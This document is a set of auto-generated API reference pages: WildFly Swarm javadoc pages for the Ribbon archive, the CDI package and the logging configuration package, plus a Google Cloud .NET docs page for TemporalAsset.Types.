href="../../../../../../org/wildfly/swarm/netflix/ribbon/package-summary.html">org.wildfly.swarm.netflix.ribbon</a> that return <a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html" title="interface in org.wildfly.swarm.netflix.ribbon">RibbonArchive</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html" title="interface in org.wildfly.swarm.netflix.ribbon">RibbonArchive</a></code></td> <td class="colLast"><span class="typeNameLabel">RibbonArchive.</span><code><span class="memberNameLink"><a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html#advertise--">advertise</a></span>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html" title="interface in org.wildfly.swarm.netflix.ribbon">RibbonArchive</a></code></td> <td class="colLast"><span class="typeNameLabel">RibbonArchive.</span><code><span class="memberNameLink"><a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html#advertise-java.lang.String-">advertise</a></span>(<a href="http://docs.oracle.com/javase/8/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</a>&nbsp;serviceNames)</code>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html" title="interface in org.wildfly.swarm.netflix.ribbon">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../../../../../../overview-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage">WildFly Swarm API, 2017.9.5</div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/wildfly/swarm/netflix/ribbon/class-use/RibbonArchive.html" target="_top">Frames</a></li> <li><a href="RibbonArchive.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2017 <a href="http://www.jboss.org">JBoss by Red Hat</a>. All rights reserved.</small></p> </body> </html>
wildfly-swarm/wildfly-swarm-javadocs
2017.9.5/apidocs/org/wildfly/swarm/netflix/ribbon/class-use/RibbonArchive.html
HTML
apache-2.0
7,782
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_60-ea) on Thu Dec 15 09:48:34 EST 2016 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>org.wildfly.swarm.cdi (Public javadocs 2016.12.1 API)</title> <meta name="date" content="2016-12-15"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../script.js"></script> </head> <body> <h1 class="bar"><a href="../../../../org/wildfly/swarm/cdi/package-summary.html" target="classFrame">org.wildfly.swarm.cdi</a></h1> <div class="indexContainer"> <h2 title="Classes">Classes</h2> <ul title="Classes"> <li><a href="CDIFraction.html" title="class in org.wildfly.swarm.cdi" target="classFrame">CDIFraction</a></li> </ul> </div> </body> </html>
wildfly-swarm/wildfly-swarm-javadocs
2016.12.1/apidocs/org/wildfly/swarm/cdi/package-frame.html
HTML
apache-2.0
924
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_60-ea) on Tue Sep 06 12:41:42 EDT 2016 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>org.wildfly.swarm.config.logging (Public javadocs 2016.9 API)</title> <meta name="date" content="2016-09-06"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="org.wildfly.swarm.config.logging (Public javadocs 2016.9 API)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage">WildFly Swarm API, 2016.9</div> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/wildfly/swarm/config/jmx/configuration/package-summary.html">Prev&nbsp;Package</a></li> <li><a href="../../../../../org/wildfly/swarm/config/mail/package-summary.html">Next&nbsp;Package</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/wildfly/swarm/config/logging/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Package" class="title">Package&nbsp;org.wildfly.swarm.config.logging</h1> </div> <div class="contentContainer"> <ul class="blockList"> <li class="blockList"> <table class="typeSummary" border="0" cellpadding="3" cellspacing="0" summary="Interface Summary table, listing interfaces, and an explanation"> <caption><span>Interface Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Interface</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/AsyncHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">AsyncHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/AsyncHandler.html" title="class in org.wildfly.swarm.config.logging">AsyncHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/AsyncHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">AsyncHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/AsyncHandler.html" title="class in org.wildfly.swarm.config.logging">AsyncHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/ConsoleHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">ConsoleHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/ConsoleHandler.html" title="class in org.wildfly.swarm.config.logging">ConsoleHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/ConsoleHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">ConsoleHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/ConsoleHandler.html" title="class in org.wildfly.swarm.config.logging">ConsoleHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/CustomFormatterConsumer.html" title="interface in org.wildfly.swarm.config.logging">CustomFormatterConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/CustomFormatter.html" title="class in org.wildfly.swarm.config.logging">CustomFormatter</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/CustomFormatterSupplier.html" title="interface in org.wildfly.swarm.config.logging">CustomFormatterSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/CustomFormatter.html" title="class in org.wildfly.swarm.config.logging">CustomFormatter</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/CustomHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">CustomHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/CustomHandler.html" title="class in org.wildfly.swarm.config.logging">CustomHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/CustomHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">CustomHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/CustomHandler.html" title="class in org.wildfly.swarm.config.logging">CustomHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/FileHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">FileHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/FileHandler.html" title="class in org.wildfly.swarm.config.logging">FileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/FileHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">FileHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/FileHandler.html" title="class in org.wildfly.swarm.config.logging">FileHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LogFileConsumer.html" title="interface in org.wildfly.swarm.config.logging">LogFileConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/LogFile.html" title="class in org.wildfly.swarm.config.logging">LogFile</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LogFileSupplier.html" title="interface in org.wildfly.swarm.config.logging">LogFileSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/LogFile.html" title="class in org.wildfly.swarm.config.logging">LogFile</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LoggerConsumer.html" title="interface in org.wildfly.swarm.config.logging">LoggerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/Logger.html" title="class in org.wildfly.swarm.config.logging">Logger</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LoggerSupplier.html" title="interface in org.wildfly.swarm.config.logging">LoggerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/Logger.html" title="class in org.wildfly.swarm.config.logging">Logger</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LoggingProfileConsumer.html" title="interface in org.wildfly.swarm.config.logging">LoggingProfileConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/LoggingProfile.html" title="class in org.wildfly.swarm.config.logging">LoggingProfile</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LoggingProfileSupplier.html" title="interface in org.wildfly.swarm.config.logging">LoggingProfileSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/LoggingProfile.html" title="class in org.wildfly.swarm.config.logging">LoggingProfile</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PatternFormatterConsumer.html" title="interface in org.wildfly.swarm.config.logging">PatternFormatterConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PatternFormatter.html" title="class in org.wildfly.swarm.config.logging">PatternFormatter</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PatternFormatterSupplier.html" title="interface in org.wildfly.swarm.config.logging">PatternFormatterSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PatternFormatter.html" title="class in org.wildfly.swarm.config.logging">PatternFormatter</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PeriodicRotatingFileHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">PeriodicRotatingFileHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PeriodicRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicRotatingFileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PeriodicRotatingFileHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">PeriodicRotatingFileHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PeriodicRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicRotatingFileHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PeriodicSizeRotatingFileHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">PeriodicSizeRotatingFileHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PeriodicSizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicSizeRotatingFileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PeriodicSizeRotatingFileHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">PeriodicSizeRotatingFileHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PeriodicSizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicSizeRotatingFileHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/RootLoggerConsumer.html" title="interface in org.wildfly.swarm.config.logging">RootLoggerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/RootLogger.html" title="class in org.wildfly.swarm.config.logging">RootLogger</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/RootLoggerSupplier.html" title="interface in org.wildfly.swarm.config.logging">RootLoggerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/RootLogger.html" title="class in org.wildfly.swarm.config.logging">RootLogger</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SizeRotatingFileHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">SizeRotatingFileHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/SizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">SizeRotatingFileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SizeRotatingFileHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">SizeRotatingFileHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/SizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">SizeRotatingFileHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandlerConsumer.html" title="interface in org.wildfly.swarm.config.logging">SyslogHandlerConsumer</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandler.html" title="class in org.wildfly.swarm.config.logging">SyslogHandler</a>&lt;T&gt;&gt;</td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandlerSupplier.html" title="interface in org.wildfly.swarm.config.logging">SyslogHandlerSupplier</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandler.html" title="class in org.wildfly.swarm.config.logging">SyslogHandler</a>&gt;</td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"> <table class="typeSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation"> <caption><span>Class Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Class</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/AsyncHandler.html" title="class in org.wildfly.swarm.config.logging">AsyncHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/AsyncHandler.html" title="class in org.wildfly.swarm.config.logging">AsyncHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a handler which writes to the sub-handlers in an asynchronous thread.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/ConsoleHandler.html" title="class in org.wildfly.swarm.config.logging">ConsoleHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/ConsoleHandler.html" title="class in org.wildfly.swarm.config.logging">ConsoleHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a handler which writes to the console.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/CustomFormatter.html" title="class in org.wildfly.swarm.config.logging">CustomFormatter</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/CustomFormatter.html" title="class in org.wildfly.swarm.config.logging">CustomFormatter</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">A custom formatter to be used with handlers.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/CustomHandler.html" title="class in org.wildfly.swarm.config.logging">CustomHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/CustomHandler.html" title="class in org.wildfly.swarm.config.logging">CustomHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a custom logging handler.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/FileHandler.html" title="class in org.wildfly.swarm.config.logging">FileHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/FileHandler.html" title="class in org.wildfly.swarm.config.logging">FileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a handler which writes to a file.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LogFile.html" title="class in org.wildfly.swarm.config.logging">LogFile</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/LogFile.html" title="class in org.wildfly.swarm.config.logging">LogFile</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Log files that are available to be read.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/Logger.html" title="class in org.wildfly.swarm.config.logging">Logger</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/Logger.html" title="class in org.wildfly.swarm.config.logging">Logger</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a logger category.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LoggingProfile.html" title="class in org.wildfly.swarm.config.logging">LoggingProfile</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/LoggingProfile.html" title="class in org.wildfly.swarm.config.logging">LoggingProfile</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">The configuration of the logging subsystem.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/LoggingProfile.LoggingProfileResources.html" title="class in org.wildfly.swarm.config.logging">LoggingProfile.LoggingProfileResources</a></td> <td class="colLast"> <div class="block">Child mutators for LoggingProfile</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PatternFormatter.html" title="class in org.wildfly.swarm.config.logging">PatternFormatter</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PatternFormatter.html" title="class in org.wildfly.swarm.config.logging">PatternFormatter</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">A pattern formatter to be used with handlers.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PeriodicRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicRotatingFileHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PeriodicRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicRotatingFileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a handler which writes to a file, rotating the log after a time period derived from the given suffix string, which should be in a format understood by java.text.SimpleDateFormat.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/PeriodicSizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicSizeRotatingFileHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/PeriodicSizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">PeriodicSizeRotatingFileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a handler which writes to a file, rotating the log after a time period derived from the given suffix string or after the size of the file grows beyond a certain point and keeping a fixed number of backups.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/RootLogger.html" title="class in org.wildfly.swarm.config.logging">RootLogger</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/RootLogger.html" title="class in org.wildfly.swarm.config.logging">RootLogger</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines the root logger for this log context.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">SizeRotatingFileHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/SizeRotatingFileHandler.html" title="class in org.wildfly.swarm.config.logging">SizeRotatingFileHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a handler which writes to a file, rotating the log after the size of the file grows beyond a certain point and keeping a fixed number of backups.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandler.html" title="class in org.wildfly.swarm.config.logging">SyslogHandler</a>&lt;T extends <a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandler.html" title="class in org.wildfly.swarm.config.logging">SyslogHandler</a>&lt;T&gt;&gt;</td> <td class="colLast"> <div class="block">Defines a syslog handler.</div> </td> </tr> </tbody> </table> </li> <li class="blockList"> <table class="typeSummary" border="0" cellpadding="3" cellspacing="0" summary="Enum Summary table, listing enums, and an explanation"> <caption><span>Enum Summary</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Enum</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/AsyncHandler.OverflowAction.html" title="enum in org.wildfly.swarm.config.logging">AsyncHandler.OverflowAction</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/ConsoleHandler.Target.html" title="enum in org.wildfly.swarm.config.logging">ConsoleHandler.Target</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/Level.html" title="enum in org.wildfly.swarm.config.logging">Level</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandler.Facility.html" title="enum in org.wildfly.swarm.config.logging">SyslogHandler.Facility</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../../../../org/wildfly/swarm/config/logging/SyslogHandler.SyslogFormat.html" title="enum in org.wildfly.swarm.config.logging">SyslogHandler.SyslogFormat</a></td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-all.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage">WildFly Swarm API, 2016.9</div> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/wildfly/swarm/config/jmx/configuration/package-summary.html">Prev&nbsp;Package</a></li> <li><a href="../../../../../org/wildfly/swarm/config/mail/package-summary.html">Next&nbsp;Package</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/wildfly/swarm/config/logging/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2016 <a href="http://www.jboss.org">JBoss by Red Hat</a>. All rights reserved.</small></p> </body> </html>
wildfly-swarm/wildfly-swarm-javadocs
2016.9/apidocs/org/wildfly/swarm/config/logging/package-summary.html
HTML
apache-2.0
26,489
<!DOCTYPE html> <html devsite=""> <head> <meta name="project_path" value="/dotnet/_project.yaml"> <meta name="book_path" value="/dotnet/_book.yaml"> </head> <body> {% verbatim %} <div> <article data-uid="Google.Cloud.Asset.V1.TemporalAsset.Types"> <h1 class="page-title">Class TemporalAsset.Types </h1> <div class="codewrapper"> <pre class="prettyprint"><code>public static class Types</code></pre> </div> <div class="markdown level0 summary"><p>Container for nested types declared in the TemporalAsset message type.</p> </div> <div class="inheritance"> <h2>Inheritance</h2> <span><span class="xref">System.Object</span></span> <span> &gt; </span> <span class="xref">TemporalAsset.Types</span> </div> <div class="inheritedMembers expandable"> <h2 class="showalways">Inherited Members</h2> <div> <span class="xref">System.Object.GetHashCode()</span> </div> <div> <span class="xref">System.Object.GetType()</span> </div> <div> <span class="xref">System.Object.MemberwiseClone()</span> </div> <div> <span class="xref">System.Object.ToString()</span> </div> </div> <h2>Namespace</h2> <a class="xref" href="Google.Cloud.Asset.V1.html">Google.Cloud.Asset.V1</a> <h2>Assembly</h2> <p>Google.Cloud.Asset.V1.dll</p> </article> </div> {% endverbatim %} </body> </html>
googleapis/doc-templates
